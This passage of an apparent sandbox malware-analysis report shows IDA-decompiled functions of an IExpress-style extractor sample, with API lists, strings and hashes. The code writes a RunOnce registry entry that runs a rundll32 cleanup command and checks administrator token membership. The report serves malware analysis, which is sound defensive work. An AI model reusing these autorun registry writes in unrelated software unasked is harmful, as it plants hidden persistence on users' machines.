                                                                        • Instruction ID: e40ef4c7227820f7c2fb81ad21876c3e64fd28d95026f177a5724582d80f6846
                                                                        • Opcode Fuzzy Hash: 2e4bb52508a7667bd8c2968e707f2264b75d05523e20656d2da9f328e3568bb7
                                                                        • Instruction Fuzzy Hash: 2941D5B1E0012CAFDB649B659C85AFE7BBDEF15730F0040AAF585D2100CB708E85AFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 62%
                                                                        			E00F32267() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v836;
                                                                        				void* _v840;
                                                                        				int _v844;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				intOrPtr _t33;
                                                                        				void* _t38;
                                                                        				intOrPtr* _t42;
                                                                        				void* _t45;
                                                                        				void* _t47;
                                                                        				void* _t49;
                                                                        				signed int _t51;
                                                                        
                                                                        				_t19 =  *0xf38004; // 0xc69e30f7
                                                                        				_t20 = _t19 ^ _t51;
                                                                        				_v8 = _t19 ^ _t51;
                                                                        				if( *0xf38530 != 0) {
                                                                        					_push(_t49);
                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                        						_push(_t38);
                                                                        						_v844 = 0x238;
                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                        							_push(_t47);
                                                                        							memset( &_v268, 0, 0x104);
                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        								E00F3658A( &_v268, 0x104, 0xf31140);
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        							E00F3171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                        							_t42 =  &_v836;
                                                                        							_t45 = _t42 + 1;
                                                                        							_pop(_t47);
                                                                        							do {
                                                                        								_t33 =  *_t42;
                                                                        								_t42 = _t42 + 1;
                                                                        							} while (_t33 != 0);
                                                                        							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                        						}
                                                                        						_t20 = RegCloseKey(_v840);
                                                                        						_pop(_t38);
                                                                        					}
                                                                        					_pop(_t49);
                                                                        				}
                                                                        				return E00F36CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                        			}



















                                                                        0x00f32272
                                                                        0x00f32277
                                                                        0x00f32279
                                                                        0x00f32283
                                                                        0x00f32289
                                                                        0x00f322ab
                                                                        0x00f322b1
                                                                        0x00f322c4
                                                                        0x00f322e0
                                                                        0x00f322e6
                                                                        0x00f322f5
                                                                        0x00f3230d
                                                                        0x00f3231c
                                                                        0x00f3231c
                                                                        0x00f32321
                                                                        0x00f3233a
                                                                        0x00f32342
                                                                        0x00f32348
                                                                        0x00f3234b
                                                                        0x00f3234c
                                                                        0x00f3234c
                                                                        0x00f3234e
                                                                        0x00f3234f
                                                                        0x00f3236e
                                                                        0x00f3236e
                                                                        0x00f3237a
                                                                        0x00f32380
                                                                        0x00f32380
                                                                        0x00f32381
                                                                        0x00f32381
                                                                        0x00f3238f

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00F322A3
                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 00F322D8
                                                                        • memset.MSVCRT ref: 00F322F5
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F32305
                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00F3236E
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F3237A
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F32321
                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00F32299
                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00F3232D
                                                                        • wextract_cleanup1, xrefs: 00F3227C, 00F322CD, 00F32363
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                        • API String ID: 3027380567-490507210
                                                                        • Opcode ID: 9bbac232f15ddc2f89442bcff601c6d4e04159d1b90e79e2020213220a117195
                                                                        • Instruction ID: a44d84f8acdf4ab04ccb2a4fc9b86c9ccd24dac0ba275176615cc7e3a7eaaaec
                                                                        • Opcode Fuzzy Hash: 9bbac232f15ddc2f89442bcff601c6d4e04159d1b90e79e2020213220a117195
                                                                        • Instruction Fuzzy Hash: AD31E5B1A0021CABDB659B11DC89FEA7B7CEF14770F0400A9B54DE6040EA75AB89EA50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00F33100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* _t8;
                                                                        				void* _t11;
                                                                        				void* _t15;
                                                                        				struct HWND__* _t16;
                                                                        				struct HWND__* _t33;
                                                                        				struct HWND__* _t34;
                                                                        
                                                                        				_t8 = _a8 - 0xf;
                                                                        				if(_t8 == 0) {
                                                                        					if( *0xf38590 == 0) {
                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                        						 *0xf38590 = 1;
                                                                        					}
                                                                        					L13:
                                                                        					return 0;
                                                                        				}
                                                                        				_t11 = _t8 - 1;
                                                                        				if(_t11 == 0) {
                                                                        					L7:
                                                                        					_push(0);
                                                                        					L8:
                                                                        					EndDialog(_a4, ??);
                                                                        					L9:
                                                                        					return 1;
                                                                        				}
                                                                        				_t15 = _t11 - 0x100;
                                                                        				if(_t15 == 0) {
                                                                        					_t16 = GetDesktopWindow();
                                                                        					_t33 = _a4;
                                                                        					E00F343D0(_t33, _t16);
                                                                        					SetDlgItemTextA(_t33, 0x834,  *0xf38d4c);
                                                                        					SetWindowTextA(_t33, "lenta");
                                                                        					SetForegroundWindow(_t33);
                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                        					 *0xf388b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                        					SetWindowLongA(_t34, 0xfffffffc, E00F330C0);
                                                                        					return 1;
                                                                        				}
                                                                        				if(_t15 != 1) {
                                                                        					goto L13;
                                                                        				}
                                                                        				if(_a12 != 6) {
                                                                        					if(_a12 != 7) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L7;
                                                                        				}
                                                                        				_push(1);
                                                                        				goto L8;
                                                                        			}









                                                                        0x00f33108
                                                                        0x00f3310b
                                                                        0x00f331b7
                                                                        0x00f331ca
                                                                        0x00f331d0
                                                                        0x00f331d0
                                                                        0x00f331da
                                                                        0x00000000
                                                                        0x00f331da
                                                                        0x00f33111
                                                                        0x00f33114
                                                                        0x00f33136
                                                                        0x00f33136
                                                                        0x00f33138
                                                                        0x00f3313b
                                                                        0x00f33141
                                                                        0x00000000
                                                                        0x00f33143
                                                                        0x00f33116
                                                                        0x00f3311b
                                                                        0x00f3314b
                                                                        0x00f33151
                                                                        0x00f33158
                                                                        0x00f3316a
                                                                        0x00f33176
                                                                        0x00f3317d
                                                                        0x00f3318b
                                                                        0x00f3319e
                                                                        0x00f331a3
                                                                        0x00000000
                                                                        0x00f331ad
                                                                        0x00f33120
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3312a
                                                                        0x00f33134
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33134
                                                                        0x00f3312c
                                                                        0x00000000

                                                                        APIs
                                                                        • EndDialog.USER32(?,00000000), ref: 00F3313B
                                                                        • GetDesktopWindow.USER32 ref: 00F3314B
                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 00F3316A
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 00F33176
                                                                        • SetForegroundWindow.USER32(?), ref: 00F3317D
                                                                        • GetDlgItem.USER32(?,00000834), ref: 00F33185
                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00F33190
                                                                        • SetWindowLongA.USER32(00000000,000000FC,00F330C0), ref: 00F331A3
                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00F331CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                        • String ID: lenta
                                                                        • API String ID: 3785188418-2780258678
                                                                        • Opcode ID: f72abe626af25e4c7d3e6f291da248352b96fda771a70547ceee4db507d647ea
                                                                        • Instruction ID: b7b91e8ffdae5083932945b464e4c9bf794139322ba2f96a9b74ca78f71b3d0f
                                                                        • Opcode Fuzzy Hash: f72abe626af25e4c7d3e6f291da248352b96fda771a70547ceee4db507d647ea
                                                                        • Instruction Fuzzy Hash: 7D11D332A08259BBDB11FF259C0CBAA3A65FB4A731F100610F855D21E0DBB89641FB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E00F318A3(void* __edx, void* __esi) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				char _v20;
                                                                        				long _v24;
                                                                        				void* _v28;
                                                                        				void* _v32;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				signed int _t23;
                                                                        				long _t45;
                                                                        				void* _t49;
                                                                        				int _t50;
                                                                        				void* _t52;
                                                                        				signed int _t53;
                                                                        
                                                                        				_t51 = __esi;
                                                                        				_t49 = __edx;
                                                                        				_t23 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t23 ^ _t53;
                                                                        				_t25 =  *0xf38128; // 0x2
                                                                        				_t45 = 0;
                                                                        				_v12 = 0x500;
                                                                        				_t50 = 2;
                                                                        				_v16.Value = 0;
                                                                        				_v20 = 0;
                                                                        				if(_t25 != _t50) {
                                                                        					L20:
                                                                        					return E00F36CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                        				}
                                                                        				if(E00F317EE( &_v20) != 0) {
                                                                        					_t25 = _v20;
                                                                        					if(_v20 != 0) {
                                                                        						 *0xf38128 = 1;
                                                                        					}
                                                                        					goto L20;
                                                                        				}
                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                        					L17:
                                                                        					CloseHandle(_v28);
                                                                        					_t25 = _v20;
                                                                        					goto L20;
                                                                        				} else {
                                                                        					_push(__esi);
                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                        					if(_t52 == 0) {
                                                                        						L16:
                                                                        						_pop(_t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                        						L15:
                                                                        						LocalFree(_t52);
                                                                        						goto L16;
                                                                        					} else {
                                                                        						if( *_t52 <= 0) {
                                                                        							L14:
                                                                        							FreeSid(_v32);
                                                                        							goto L15;
                                                                        						}
                                                                        						_t15 = _t52 + 4; // 0x4
                                                                        						_t50 = _t15;
                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                        							_t45 = _t45 + 1;
                                                                        							_t50 = _t50 + 8;
                                                                        							if(_t45 <  *_t52) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L14;
                                                                        						}
                                                                        						 *0xf38128 = 1;
                                                                        						_v20 = 1;
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        			}


















                                                                        0x00f318a3
                                                                        0x00f318a3
                                                                        0x00f318ab
                                                                        0x00f318b2
                                                                        0x00f318b5
                                                                        0x00f318be
                                                                        0x00f318c0
                                                                        0x00f318c6
                                                                        0x00f318c7
                                                                        0x00f318ca
                                                                        0x00f318cf
                                                                        0x00f319c9
                                                                        0x00f319d8
                                                                        0x00f319d8
                                                                        0x00f318df
                                                                        0x00f319b8
                                                                        0x00f319bd
                                                                        0x00f319bf
                                                                        0x00f319bf
                                                                        0x00000000
                                                                        0x00f319bd
                                                                        0x00f318fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f31912
                                                                        0x00f319aa
                                                                        0x00f319ad
                                                                        0x00f319b3
                                                                        0x00000000
                                                                        0x00f31927
                                                                        0x00f31927
                                                                        0x00f31932
                                                                        0x00f31936
                                                                        0x00f319a9
                                                                        0x00f319a9
                                                                        0x00000000
                                                                        0x00f319a9
                                                                        0x00f3194c
                                                                        0x00f319a2
                                                                        0x00f319a3
                                                                        0x00000000
                                                                        0x00f3196e
                                                                        0x00f31970
                                                                        0x00f31999
                                                                        0x00f3199c
                                                                        0x00000000
                                                                        0x00f3199c
                                                                        0x00f31972
                                                                        0x00f31972
                                                                        0x00f31975
                                                                        0x00f31984
                                                                        0x00f31985
                                                                        0x00f3198a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3198c
                                                                        0x00f31991
                                                                        0x00f31996
                                                                        0x00000000
                                                                        0x00f31996
                                                                        0x00f3194c

                                                                        APIs
                                                                          • Part of subcall function 00F317EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F318DD), ref: 00F3181A
                                                                          • Part of subcall function 00F317EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F3182C
                                                                          • Part of subcall function 00F317EE: AllocateAndInitializeSid.ADVAPI32(00F318DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F318DD), ref: 00F31855
                                                                          • Part of subcall function 00F317EE: FreeSid.ADVAPI32(?,?,?,?,00F318DD), ref: 00F31883
                                                                          • Part of subcall function 00F317EE: FreeLibrary.KERNEL32(00000000,?,?,?,00F318DD), ref: 00F3188A
                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00F318EB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00F318F2
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00F3190A
                                                                        • GetLastError.KERNEL32 ref: 00F31918
                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 00F3192C
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00F31944
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F31964
                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 00F3197A
                                                                        • FreeSid.ADVAPI32(?), ref: 00F3199C
                                                                        • LocalFree.KERNEL32(00000000), ref: 00F319A3
                                                                        • CloseHandle.KERNEL32(?), ref: 00F319AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                        • String ID:
                                                                        • API String ID: 2168512254-0
                                                                        • Opcode ID: 9908d0a7f11edbe80abdac3f918a37d52264bc096a742c6237a5b9b67ecd068f
                                                                        • Instruction ID: 8bf5e64a103a973cb86ecc711507b857e64b7b44a992de525e230a64d86cc20f
                                                                        • Opcode Fuzzy Hash: 9908d0a7f11edbe80abdac3f918a37d52264bc096a742c6237a5b9b67ecd068f
                                                                        • Instruction Fuzzy Hash: F1313C71E01209AFDB209FA6DC48AAFBBBDFF04370F100429E545D2150D7349915EB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E00F3468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				long _t4;
                                                                        				void* _t11;
                                                                        				CHAR* _t14;
                                                                        				void* _t15;
                                                                        				long _t16;
                                                                        
                                                                        				_t14 = __ecx;
                                                                        				_t11 = __edx;
                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                        				_t16 = _t4;
                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                        					if(_t16 == 0) {
                                                                        						L5:
                                                                        						return 0;
                                                                        					}
                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                        					FreeResource(_t15);
                                                                        					return _t16;
                                                                        				}
                                                                        				return _t4;
                                                                        			}








                                                                        0x00f34699
                                                                        0x00f3469b
                                                                        0x00f346a9
                                                                        0x00f346af
                                                                        0x00f346b4
                                                                        0x00f346bc
                                                                        0x00f346f9
                                                                        0x00000000
                                                                        0x00f346f9
                                                                        0x00f346d9
                                                                        0x00f346dd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f346e5
                                                                        0x00f346ef
                                                                        0x00000000
                                                                        0x00f346f5
                                                                        0x00f346ff

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                        • LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                        • memcpy_s.MSVCRT ref: 00F346E5
                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                        • String ID: TITLE$lenta
                                                                        • API String ID: 3370778649-2035842925
                                                                        • Opcode ID: 81adc76d5f33af3d9b74ddb020c7a040a66e3f225011bd18712fa506c481929d
                                                                        • Instruction ID: fbb18c6c133b8884760cf827b5c595ddb23893439dc87b799f457bc31569e903
                                                                        • Opcode Fuzzy Hash: 81adc76d5f33af3d9b74ddb020c7a040a66e3f225011bd18712fa506c481929d
                                                                        • Instruction Fuzzy Hash: 2D01A9766442187BE3102BA65C4DF6B7E2DDBC6F71F040014FA8997191C9B1A841A6B6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 57%
                                                                        			E00F317EE(intOrPtr* __ecx) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				void* _v24;
                                                                        				intOrPtr* _v28;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t14;
                                                                        				_Unknown_base(*)()* _t20;
                                                                        				long _t28;
                                                                        				void* _t35;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				signed int _t38;
                                                                        				intOrPtr* _t39;
                                                                        
                                                                        				_t14 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t14 ^ _t38;
                                                                        				_v12 = 0x500;
                                                                        				_t37 = __ecx;
                                                                        				_v16.Value = 0;
                                                                        				_v28 = __ecx;
                                                                        				_t28 = 0;
                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                        				if(_t36 != 0) {
                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                        					_v20 = _t20;
                                                                        					if(_t20 != 0) {
                                                                        						 *_t37 = 0;
                                                                        						_t28 = 1;
                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                        							_t37 = _t39;
                                                                        							 *0xf3a288(0, _v24, _v28);
                                                                        							_v20();
                                                                        							if(_t39 != _t39) {
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        							FreeSid(_v24);
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t36);
                                                                        				}
                                                                        				return E00F36CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                        			}



















                                                                        0x00f317f6
                                                                        0x00f317fd
                                                                        0x00f31805
                                                                        0x00f3180b
                                                                        0x00f3180d
                                                                        0x00f31815
                                                                        0x00f31818
                                                                        0x00f31820
                                                                        0x00f31824
                                                                        0x00f3182c
                                                                        0x00f31832
                                                                        0x00f31837
                                                                        0x00f31851
                                                                        0x00f31854
                                                                        0x00f3185d
                                                                        0x00f31862
                                                                        0x00f3186c
                                                                        0x00f31872
                                                                        0x00f31877
                                                                        0x00f3187e
                                                                        0x00f3187e
                                                                        0x00f31883
                                                                        0x00f31883
                                                                        0x00f3185d
                                                                        0x00f3188a
                                                                        0x00f3188a
                                                                        0x00f318a2

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F318DD), ref: 00F3181A
                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F3182C
                                                                        • AllocateAndInitializeSid.ADVAPI32(00F318DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F318DD), ref: 00F31855
                                                                        • FreeSid.ADVAPI32(?,?,?,?,00F318DD), ref: 00F31883
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00F318DD), ref: 00F3188A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                        • API String ID: 4204503880-1888249752
                                                                        • Opcode ID: f79d72ed6157932055aa76a9f6f74d48043478f9d61e199b4ff1e4daee68dd6b
                                                                        • Instruction ID: 28c8e90e44aeca7c69f856ebb5080f35af20080430ccb91608ebf72211417d14
                                                                        • Opcode Fuzzy Hash: f79d72ed6157932055aa76a9f6f74d48043478f9d61e199b4ff1e4daee68dd6b
                                                                        • Instruction Fuzzy Hash: 5C11B671E00209AFDB149FA5DC49ABEBB79FF44721F100169F941E3290DB308D01AB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F33450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t7;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				int _t22;
                                                                        				struct HWND__* _t24;
                                                                        
                                                                        				_t7 = _a8 - 0x10;
                                                                        				if(_t7 == 0) {
                                                                        					EndDialog(_a4, 2);
                                                                        					L11:
                                                                        					return 1;
                                                                        				}
                                                                        				_t11 = _t7 - 0x100;
                                                                        				if(_t11 == 0) {
                                                                        					_t12 = GetDesktopWindow();
                                                                        					_t24 = _a4;
                                                                        					E00F343D0(_t24, _t12);
                                                                        					SetWindowTextA(_t24, "lenta");
                                                                        					SetDlgItemTextA(_t24, 0x838,  *0xf39404);
                                                                        					SetForegroundWindow(_t24);
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t11 == 1) {
                                                                        					_t22 = _a12;
                                                                        					if(_t22 < 6) {
                                                                        						goto L11;
                                                                        					}
                                                                        					if(_t22 <= 7) {
                                                                        						L8:
                                                                        						EndDialog(_a4, _t22);
                                                                        						return 1;
                                                                        					}
                                                                        					if(_t22 != 0x839) {
                                                                        						goto L11;
                                                                        					}
                                                                        					 *0xf391dc = 1;
                                                                        					goto L8;
                                                                        				}
                                                                        				return 0;
                                                                        			}








                                                                        0x00f33459
                                                                        0x00f3345c
                                                                        0x00f334d8
                                                                        0x00f334de
                                                                        0x00000000
                                                                        0x00f334e0
                                                                        0x00f3345e
                                                                        0x00f33463
                                                                        0x00f3349a
                                                                        0x00f334a0
                                                                        0x00f334a7
                                                                        0x00f334b2
                                                                        0x00f334c4
                                                                        0x00f334cb
                                                                        0x00000000
                                                                        0x00f334cb
                                                                        0x00f33468
                                                                        0x00f3346e
                                                                        0x00f33474
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3347c
                                                                        0x00f3348c
                                                                        0x00f33490
                                                                        0x00000000
                                                                        0x00f33496
                                                                        0x00f33484
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33486
                                                                        0x00000000
                                                                        0x00f33486
                                                                        0x00000000

                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00F33490
                                                                        • GetDesktopWindow.USER32 ref: 00F3349A
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 00F334B2
                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 00F334C4
                                                                        • SetForegroundWindow.USER32(?), ref: 00F334CB
                                                                        • EndDialog.USER32(?,00000002), ref: 00F334D8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
